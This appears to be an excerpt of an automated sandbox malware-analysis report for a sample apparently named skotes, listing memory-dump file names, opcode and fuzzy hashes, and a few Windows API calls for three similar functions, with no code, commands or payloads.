                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 0a67964dc0d5b821839884acaf392af426e65aa350aa35df66cfa447cefa6ff3
                                                                                                                                                                                            • Instruction ID: 55585e42df8d1ca31cf978ea9dccc3b0b8c9a236d9f2bed741b53679864d9a3d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a67964dc0d5b821839884acaf392af426e65aa350aa35df66cfa447cefa6ff3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 353148317943449BEB1CDBACDC887AEB773AB96350F248218E014DB3D5C7758A808752
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A41B
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 5007c9b66a55da569056aa1296136aac22e1348a4388b52f111f1634fb086762
                                                                                                                                                                                            • Instruction ID: aefe2d0d9af749873274c6fd6578b39f0cb2661e1a2b510a2238ebb1a4a865e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5007c9b66a55da569056aa1296136aac22e1348a4388b52f111f1634fb086762
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2311731B943049BEB0C9BFCDD8DBAEB673EB95310F248218E0549B3D6D7B549808696
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A550
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 3e11da1e54340ef0a184ffc77f3eb374e9114b23f31f247f073b7e20e76c25fb
                                                                                                                                                                                            • Instruction ID: 89c7de18f485295605299d062d16c1c97ac64a02d11e52da6917c3a3a9b406b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e11da1e54340ef0a184ffc77f3eb374e9114b23f31f247f073b7e20e76c25fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93311531B943049BEB0CDBB8DD89BAEB773EB85354F248618E0149B3D6C77589808756
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A685
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
